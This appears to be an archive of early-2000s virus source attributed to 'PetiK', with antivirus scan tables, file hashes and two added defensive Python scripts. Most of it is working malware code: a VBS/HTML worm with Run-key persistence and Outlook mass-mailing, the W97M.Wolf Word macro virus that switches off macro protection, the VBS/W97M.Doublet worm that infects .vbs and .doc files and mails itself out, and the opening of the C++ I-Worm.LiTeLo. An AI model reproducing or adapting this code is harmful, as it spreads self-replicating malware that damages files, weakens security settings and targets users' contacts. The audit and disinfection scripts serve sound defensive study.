ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs"
' Generate %SYSTEM%\lindamail.vbs: mails LoveLinda.htm to every Outlook address-book entry
Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2)
mail.WriteLine "On Error Resume Next"
mail.WriteLine "Set out=CreateObject(""Outlook.Application"")"
mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")"
mail.WriteLine "For Each C In B.AddressLists"
mail.WriteLine "If C.AddressEntries.Count <> 0 Then"
mail.WriteLine "For D=1 To C.AddressEntries.count"
mail.WriteLine "Set em=C.AddressEntries(D)"
mail.WriteLine "Set lm=out.CreateItem(0)"
mail.WriteLine "lm.To=em.Address"
mail.WriteLine "lm.Subject=""Love Message..."""
mail.WriteLine "lm.Body=""Read this beautiful love message."""
mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")"
mail.WriteLine "lm.DeleteAfterSubmit=True"
mail.WriteLine "If lm.To <> """" Then"
mail.WriteLine "F.Send"
' NB: the generated script never defines an object named F (the item is lm), so under
' On Error Resume Next the Send call fails silently and no message actually leaves
mail.WriteLine "End If"
mail.WriteLine "Next"
mail.WriteLine "End If"
mail.WriteLine "Next"
End If

' For every .ini/.txt/.bmp/.doc/.xls/.mp3/.hlp/.inf file in the folder, write a companion
' <name>.<ext>.htm carrying the page body; the original file itself is left intact
Function create(doss)
Set FolderObj = fso.GetFolder(doss)
Set FO = FolderObj.Files
For each file in FO
ext = lcase(fso.GetExtensionName(file.Name))
if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3" or ext="hlp" or ext="inf" Then
Set linda = fso.CreateTextFile(file.path&".htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
end if
next
End Function
</script></body></html>

File Linda.htm received on 05.16.2009 17:51:29 (CET)
Antivirus / Version / Last Update / Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.04
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 JS/Mailer.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675
CAT-QuickHeal 10.00 2009.05.15 (no detection)
ClamAV 0.94.1 2009.05.16 (no detection)
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 (no detection)
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda
F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A
GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy
K7AntiVirus 7.10.737 2009.05.16 (no detection)
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic@MM
McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.04
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 HTML/Worm.gen
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A
Prevx 3.0 2009.05.16 (no detection)
Rising 21.29.52.00 2009.05.16 (no detection)
Sophos 4.41.0 2009.05.16 VBS/Petik-N
Sunbelt 3.2.1858.2 2009.05.16 (no detection)
Symantec 1.4.4.12 2009.05.16 (no detection)
TheHacker 6.3.4.1.326 2009.05.15 (no detection)
TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A

Additional information
File size: 2755 bytes
MD5: 43ac95142a5c7281246b68ef0584e079
SHA1: 66758177710fcdd652c37671efe593f7651248e2


Name : W97M.Wolf
Author : PetiK
Language : VBA Word
Date : 25/02/2002

Attribute VB_Name = "Wolf"

' Entry point: runs when an infected document (or the infected Normal template) is opened
Sub AutoOpen()
    Call EndProtect
    Call Infection
    Call SearchF
    If Day(Now) = 15 Then Call Payload
End Sub

Sub HelpAbout()
    With Application.Assistant
        .Visible = True
    End With
    MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A"
    Application.UserName = "My Name is Wolf"
End Sub

Sub AutoClose()
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Wolf"
        .Title = "My Friend the Wolf"
        .Subject = "Tex Avery and the other"
        .Keywords = "Wolf, Tex Avery, Ed Love, Droopy"
        .Comments = "No comments"
        .Execute
    End With
    If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then
        ActiveDocument.Save
    End If
End Sub

' Copy the "Wolf" module between the Normal template and the active document
' through an exported module file (C:\Wolf.sys), whichever side is still clean
Sub Infection()
    On Error Resume Next
    Set Nor = NormalTemplate.VBProject.VBComponents
    Set Doc = ActiveDocument.VBProject.VBComponents
    DropFile = "C:\Wolf.sys"
    If Nor.Item("Wolf").Name <> "Wolf" Then
        Doc("Wolf").Export DropFile
        Nor.Import DropFile
    End If
    If Doc.Item("Wolf").Name <> "Wolf" Then
        Nor("Wolf").Export DropFile
        Doc.Import DropFile
        ActiveDocument.Save
    End If
End Sub

' Clear the attributes (read-only etc.) of every .doc in the root of C:\
Sub SearchF()
    With Application.FileSearch
        .FileName = "*.doc"
        .LookIn = "C:\"
        .SearchSubFolders = False
        .FileType = msoFileTypeWordDocuments
        .Execute
        For I = 1 To .FoundFiles.Count
            FileSystem.SetAttr .FoundFiles(I), vbNormal
        Next I
    End With
End Sub

' Switch off Word's macro warnings. System.PrivateProfileString with an empty file name
' reads/writes the registry: Level=1 is the "Low" security setting (macros run without a
' prompt) and AccessVBOM=1 (Word 2002) allows programmatic access to the VBA project,
' which Infection() needs for its Export/Import calls
Sub EndProtect()
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    Select Case Application.Version
        Case "10.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
        Case "9.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    End Select
    WordBasic.DisableAutoMacros 0
End Sub

' Payload on the 15th of any month: open Notepad and type a message into it
Sub Payload()
    MyApp = Shell("notepad.exe", 1)
    SendKeys "This is my last Word97Macro virus.", True
    AppActivate (MyApp)
End Sub

File Wolf.doc received on 05.11.2009 21:18:10 (CET)
Scan results (the four columns were flattened in extraction; engine, version and last-update lists are in the same order, while the Result list omits engines that reported nothing and so cannot be mapped back to engines by position):
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6500 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.732 7.0.0.125 5612 5612 6.7.6 1.4602 4065 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.04.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1729 4.6.5.0
Last Update: 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.11 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.11
Result: Virus.MSWord.Droopy.A!IK W97M/Droopy.B W2000M/Droopy.A W97M/Droopy.A MW97:Droopy family W97M/Beko W97M.Droopy.A a variant of virus W97M.Inadd WM.Pivis Virus.MSWord.Droopy W97M.Droopy W97M.Wolf.A W97M/Droopy.A W97M/Droopy.A Virus.MSWord.Droopy W97M/Droopy.A W97M.Droopy.A Virus.MSWord.Droopy.A Macro.Droopy Virus.MSWord.Droopy W97M/Generic W97M/Generic Macro.Droopy.A Virus:W97M/Droopy.A W97M/Droopy.A W97M/Droopy.A W97M.Droopy.A W97M/CokeBoy WORD.97.Flow.A Macro.Word97.Wolf.a WM97/Droopy-A W97M.Droopy (v) W97M.Droopy.A W2KM/Generico W97M_Generic Virus.MSWord.Droopy W97M.Droopy.A WORD.97.Flow.A

Additional information
File size: 40960 bytes
MD5: 456d71a02c519c6a1f13fa9ffc899f2e
SHA1: 534f5ae68f8634c6c69a5b40ad131a4bf674d000


Name : VBS/W97M.Doublet
Author : PetiK
Language : VBS
Date : 02/03/2002

On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
' Read the running file's own text; "virus" is what gets appended to every .vbs/.vbe victim
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close
personal=ws.SpecialFolders("MyDocuments")
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs")
' Drop the Word macro component as C:\Doublet.sys: the same Normal-template/ActiveDocument
' import-export infector and security downgrade as W97M.Wolf above
Set vw=sf.CreateTextFile("C:\Doublet.sys")
vw.WriteLine "Attribute VB_Name = ""Doublet"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FuckProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 10 Then"
vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\Doublet.sys"""
vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Doc(""Doublet"").Export Drop"
vw.WriteLine " Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Nor(""Doublet"").Export Drop"
vw.WriteLine " Doc.Import Drop"
vw.WriteLine " ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FuckProtect()"
vw.WriteLine "With Options"
vw.WriteLine " .ConfirmConversions = False"
vw.WriteLine " .VirusProtection = False"
vw.WriteLine " .SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine " System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close
' Prepend/append infection of every .vbs/.vbe on removable and fixed drives
lecteur()
' Lower Word macro security from the script as well (Level 1 = Low, AccessVBOM = VBA project access)
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
' Mass-mail through Outlook: one copy per address-book entry, saved under a random name
' with a double extension (<random>.<exe|com|bat|bmp|jpg|gif|doc|xls|ppt|htm|htt|hta>.vbs)
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."
Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this attached found on the net."
body = body & VbCrLf & ""
body = body & VbCrLf & " See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next
' Open every .doc under My Documents in a hidden Word instance and import the macro module
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("Doublet").Name <> "Doublet" Then
Doc.Import ("C:\Doublet.sys")
wrd.ActiveDocument.Save
End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

' Walk every removable (DriveType 2) and fixed (DriveType 3) drive
Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

' Infect each .vbs/.vbe in a folder that does not yet start with the marker line:
' marker line, the original host text, a blank line, then the worm text read above
Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
Set cot=sf.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS/W97M.Doublet" then
cot.Close
Set cot=sf.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=sf.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS/W97M.Doublet"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine virus
inf.Close
End If
End If
Next
End Sub

' Recurse into subfolders. NB: "Set sf = f.SubFolders" overwrites the script-level
' FileSystemObject of the same name; infecte() papers over it by recreating sf (original bug)
Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
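Both W97M.Wolf (EndProtect) and VBS/W97M.Doublet (the three RegWrite calls above) leave the same trace on a victim profile: Level=1 and AccessVBOM=1 under HKCU\Software\Microsoft\Office\<version>\Word\Security. The Python below is an added example, not PetiK's code: it parses a `reg export` text dump and lists those downgrades so a responder can audit an exported profile offline. The .reg sample in it is constructed for the demonstration; the key pattern also accepts the other Office applications' Security keys, which these two samples never touch. Level 1 is the "Low" setting of the Word 2000/2002 security dialog (macros run without a prompt); AccessVBOM is what makes the VBComponents Export/Import used by both infectors possible.

```python
"""Audit a Windows .reg export for the Office macro-security downgrades that W97M.Wolf and
VBS/W97M.Doublet write (Level=1 and AccessVBOM=1 under HKCU\\...\\Office\\<ver>\\Word\\Security).

Added example, not part of the archive. On a Windows host the input is produced with
    reg export "HKCU\\Software\\Microsoft\\Office" office.reg
and the file's text is passed to audit_reg_text().
"""
import re
from typing import Dict, List, Tuple

SECURITY_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\(?P<ver>\d+\.\d+)\\"
    r"(?P<app>Word|Excel|PowerPoint|Outlook|Access)\\Security$",
    re.IGNORECASE,
)

# Word 2000/2002 security dialog: 1 = Low (macros run silently), 2 = Medium (prompt), 3 = High
LEVEL_NAMES = {1: "Low", 2: "Medium", 3: "High"}


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Minimal .reg parser: [key] headers plus "name"=dword:... and "name"="..." values."""
    values: Dict[str, Dict[str, object]] = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            values.setdefault(key, {})
            continue
        m = re.match(r'^"(?P<name>[^"]+)"=(?P<val>.+)$', line)
        if key is None or not m:
            continue                      # @= defaults, hex: blobs etc. are not needed here
        name, val = m.group("name"), m.group("val")
        if val.lower().startswith("dword:"):
            values[key][name] = int(val[len("dword:"):], 16)
        elif len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            values[key][name] = val[1:-1].replace("\\\\", "\\")
    return values


def audit_macro_security(values: Dict[str, Dict[str, object]]) -> List[Tuple[str, str, int, str]]:
    """Return (key, value name, value, reason) for every weakened macro-security setting."""
    findings = []
    for key, vals in values.items():
        if not SECURITY_KEY.match(key):
            continue
        level = vals.get("Level")
        if isinstance(level, int) and level < 3:
            findings.append((key, "Level", level,
                             "macro security set to %s" % LEVEL_NAMES.get(level, str(level))))
        if vals.get("AccessVBOM") == 1:
            findings.append((key, "AccessVBOM", 1,
                             "programmatic access to the VBA project enabled (module import/export)"))
    return findings


def audit_reg_text(text: str) -> List[Tuple[str, str, int, str]]:
    return audit_macro_security(parse_reg_export(text))


# Constructed sample: what Wolf/Doublet leave behind on a host with Word 2000 and 2002,
# plus an untouched Excel key that must not be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security]
"Level"=dword:00000003
"AccessVBOM"=dword:00000000
"""

if __name__ == "__main__":
    for key, name, value, reason in audit_reg_text(SAMPLE_REG):
        print("%s\\%s = %d : %s" % (key, name, value, reason))
```

The parser deliberately ignores everything but dword and string values; that is all these keys ever hold, and it keeps the audit readable.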

File Doublet.vbs received on 05.16.2009 11:30:45 (CET)
Scan results (the four columns were flattened in extraction; engine, version and last-update lists are in the same order, while the Result list omits engines that reported nothing and so cannot be mapped back to engines by position):
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15
Result: Email-Worm.VBS.Doublet!IK VBS/Doublet Worm/Yumaho Worm/VBS.VBS VBS/Doublet.A@mm VBS:Doublet VBS/Telbound.A Generic.ScriptWorm.897E1D20 VBS/Doublet.A Worm.VBS.Yumao Worm.VBS.Agent.~H VBS.Doublet VBS.LoveLet3. VBS/Yuma VBS/Doublet.A@mm Email-Worm.VBS.Doublet VBS/Doublet.A@mm Generic.ScriptWorm.897E1D20 Email-Worm.VBS.Doublet Email-Worm.VBS.Doublet VBS/Dossier@MM VBS/Dossier@MM Worm.Yumaho Virus:VBS/Doublet.A VBS/Doublet.A VBS/Doublet.H VBS.Doublet.A@mm VBS/Doublet.A.worm VBS.Doubt.A Script.VBS.I-Worm.Doublet VBS/Telboud-A Macro.src VBS_Doublet.A Email-Worm.VBS.Doublet VBS.Doubt.A

Additional information
File size: 5258 bytes
MD5: bdd4e8ab9db0d5e79474cb50f1f0ebda
SHA1: 303d4183f401e9bf707dab9d05d993e329f71753
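Sub infecte above prepends the line 'VBS/W97M.Doublet to each .vbs/.vbe it finds, writes the original host text, a blank line, and then the text the running copy read from itself. Because that text is the running file's whole content, a victim infected by an already-infected script carries a complete first-generation infected file, marker line included. The Python below is an added example, not PetiK's code: it recognises the layout, cuts the host out in front of the appended payload, and handles that nested case by stopping at whichever comes first, a second marker line or the first four lines of the bare worm body as printed on this page. The fixtures are built by a helper that reproduces the worm's own write sequence; nothing here is taken from an infected sample.

```python
"""Detect and remove the VBS/W97M.Doublet prepend/append infection from a .vbs/.vbe host.

Added example, not part of the archive. It mirrors the write sequence in Sub infecte():
    "'VBS/W97M.Doublet" CRLF + <host> + CRLF + <text the running copy read from itself> + CRLF
Because the appended text is the running file's own content, a second-generation victim
carries a complete first-generation infected file, marker line included.
"""
from typing import List, Optional, Tuple

MARKER = "'VBS/W97M.Doublet"

# First four lines of the worm body as printed on this page; the fallback anchor when the
# appended payload is a first-generation (marker-less) copy of the worm.
WORM_HEAD = (
    "On Error Resume Next",
    'Set sf=CreateObject("Scripting.FileSystemObject")',
    'Set ws=CreateObject("WScript.Shell")',
    "Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)",
)


def infect(host: str, worm: str) -> str:
    """Reproduce the worm's output layout (used only to build fixtures)."""
    return MARKER + "\r\n" + host + "\r\n" + worm + "\r\n"


def is_infected(text: str) -> bool:
    """Same test the worm itself makes before infecting: marker on the first line."""
    return text.split("\n", 1)[0].rstrip("\r") == MARKER


def _payload_start(body: List[str]) -> Optional[int]:
    """Index of the first line of the appended payload: a nested marker or the bare worm head."""
    for i in range(len(body)):
        if body[i] == MARKER:
            return i
        if tuple(body[i:i + len(WORM_HEAD)]) == WORM_HEAD:
            return i
    return None


def disinfect(text: str) -> Tuple[str, bool]:
    """Return (cleaned text, was_infected). A marker without a recognisable payload is left alone."""
    if not is_infected(text):
        return text, False
    newline = "\r\n" if "\r\n" in text else "\n"
    body = text.splitlines()[1:]          # drop the marker line
    cut = _payload_start(body)
    if cut is None:
        return text, False
    host = body[:cut]
    # The worm wrote the host with Write() and then WriteLine "", so a host that already
    # ended with a newline shows up here with one extra empty line.
    if host and host[-1] == "":
        host.pop()
    return newline.join(host) + newline, True


if __name__ == "__main__":
    host = 'MsgBox "hi"\r\n'
    gen1 = infect(host, "\r\n".join(WORM_HEAD) + "\r\n")
    gen2 = infect("' second host\r\n", gen1)
    print(disinfect(gen1)[0] == host, disinfect(gen2)[0] == "' second host\r\n")
```

A host that did not end with a newline comes back with one; everything else is byte-for-byte the original. Files that carry the marker but no recognisable payload are returned unchanged so they can be reviewed by hand rather than truncated by a guess.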

/*
 Name     : I-Worm.LiTeLo
 Author   : PetiK
 Date     : March 7th 2002 - March 10th 2002
 Language : C++/HTML
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#pragma argused

char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
      Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo";
char dn[20]="Flash32 Uninstall",ust[40];
BYTE htmail[10];
DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail);
LPTSTR cmdLine,ptr;
BOOL installed,uninstall;
HMODULE kernel32;
FILE *htm;
LHANDLE session;
MapiMessage *mess;
HINSTANCE WiNet,hMAPI;
char messId[512],mname[50],maddr[30];

/* Dropped as %system%\FlashNet.htm. Opened in the browser with ActiveX allowed, the
   VBScript mails %system%\Flash32.exe to every Outlook address-book entry, then writes
   HKLM\Software\Microsoft\HTMail = "OK" so the page is not shown again. */
char htmms[]="<html><head><title>Flash Information</title></head>\n"
"<body><script language=vbscript>\n"
"On Error Resume Next\n"
"msgbox \"Please accept ActiveX by clicking YES\",vbinformation,\"Flash32 NET\"\n"
"Set abcgqlbg=CreateObject(\"Scripting.FileSystemObject\")\n"
"Set gqlbgrlb=CreateObject(\"WScript.Shell\")\n\n"
"If err.number=429 Then\n"
"gqlbgrlb.Run javascript:location.reload()\n\n"
"Else\n\n"
"mess=\"Contact :\"\n"
"Set bgqlbgqm=CreateObject(\"Outlook.Application\")\n"
"Set mbgqlbgq=bgqlbgqm.GetNameSpace(\"MAPI\")\n"
"For Each C In mbgqlbgq.AddressLists\n"
"If C.AddressEntries.Count <> 0 Then\n"
"For D=1 To C.AddressEntries.Count\n"
"Set qlbgqlbg=C.AddressEntries(D)\n"
"Set gqlcgqlb=bgqlbgqm.CreateItem(0)\n"
"mess=mess &vbCrLf& qlbgqlbg.Address\n"
"gqlcgqlb.To=qlbgqlbg.Address\n"
"gqlcgqlb.Subject=\"New Version of Flash.\"\n"
"gqlcgqlb.Body=\"Unlimited demo verion of Flash.\"\n"
"gqlcgqlb.Attachments.Add(abcgqlbg.GetSpecialFolder(1)&\"\\Flash32.exe\")\n"
"gqlcgqlb.DeleteAfterSubmit=True\n"
"If gqlcgqlb.To <> \"\" Then\n"
"gqlcgqlb.Send\n"
"End If\n"
"Next\n"
"End If\n"
"Next\n\n"
"MsgBox mess,vbinformation,\"Flash Contact\"\n"
"gqlbgrlb.RegWrite \"HKLM\\Software\\Microsoft\\HTMail\",\"OK\"\n"
"gqlbgrlb.Run javascript:location.href=(\"http://www.flash.com\")\n"
"End If\n"
"</script></body></html>";

/* Attachment names offered to recipients */
char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe",
                 "freeflash32.exe","installflash.exe","setupflash.exe"};
HKEY hReg;
SYSTEMTIME systime;

/* Resolved at run time with GetProcAddress so the import table stays small */
BOOL (PASCAL FAR *INetConnect)(LPDWORD flags,DWORD reserved);
ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
  /* Hide from the Win9x task list */
  kernel32=GetModuleHandle("KERNEL32.DLL");
  if(kernel32)
  {
    (FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess");
